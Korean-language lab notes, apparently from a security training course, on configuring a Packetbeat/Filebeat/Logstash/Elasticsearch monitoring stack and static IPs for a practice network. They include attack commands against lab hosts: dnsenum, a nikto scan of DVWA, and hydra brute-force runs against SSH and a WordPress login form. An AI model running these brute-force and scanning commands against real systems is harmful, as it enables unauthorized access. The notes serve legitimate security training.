nano /etc/packetbeat/packetbeat.yml ->localhost지우고 10.0.2.3로변경 ->systemctl restart packetbeat
packetbeat이름복사 name에 붙여넣기


dnsenum st.kr
nikto dvwa.st.kr
hydra -L user.txt -P passwd.txt st.kr ssh

nano /etc/filebeat/filebeat.yml -> enable true로변경 -> localhost 10.0.2.3:5044로 변경

cd /etc/logstash/conf.d
nano sample.conf
input {
beats {
port => 5044
}
}

output {
elasticsearch {
hosts => ["localhost:9200"]
index => "IP15_logstash-%{+YYYY.MM.dd}"
}
}
systemctl start logstash
netstat -ant | grep 5044


hydra vulnwp
http-form-post
"/wordpress/wp-login.php:
log=^USER^&pwd=^PASS^
&wp-submit=%EB%A1%9C%EA%B7%B8%EC%9D%B8
&redirect_to=http%3A%2F%2Fvulnwp%2Fwordpress%2Fwp-admin%2F
&testcookie=1:비밀번호가 틀립니다."
-l admin -P weakpass.txt

네트워크 환경
192.168.56.0/24 대역대로 변경됨
ip 확인하고 고정으로 변경

모든 서비스가 정상적으로 운영되도록 설정할것

해커1
192.168.56.101
서버2
192.168.56.102
SELK3
192.168.56.103
win4
192.168.56.104

nano /etc/netplan/50[tab]
dhcp4: no
addresses: [192.168.56.101/24]
gateway4: 192.168.56.254
nameservers:
addresses: [192.168.56.102]

netplan apply

win7 네트워크 설정->컴퓨터->제어판->모든 제어판 항목->네트워크 및 공유 센터->어댑터 설정변경->ip주소 192.168.56.104 서브넷마스크 255.255.255.0 dns서버 192.168.56.102
win7에서 cmd에서 nslookup web.st.kr등 ip확인 -> ping 해커 서버 SELK ip

dvwa에서 사용된 users 테이블은 몇개의 필드로 구성되어 있고 왜 있는가?
user_id
first_name
last_name
user
password
avatar
last_login timetamp (시간)
failed_login int (정수)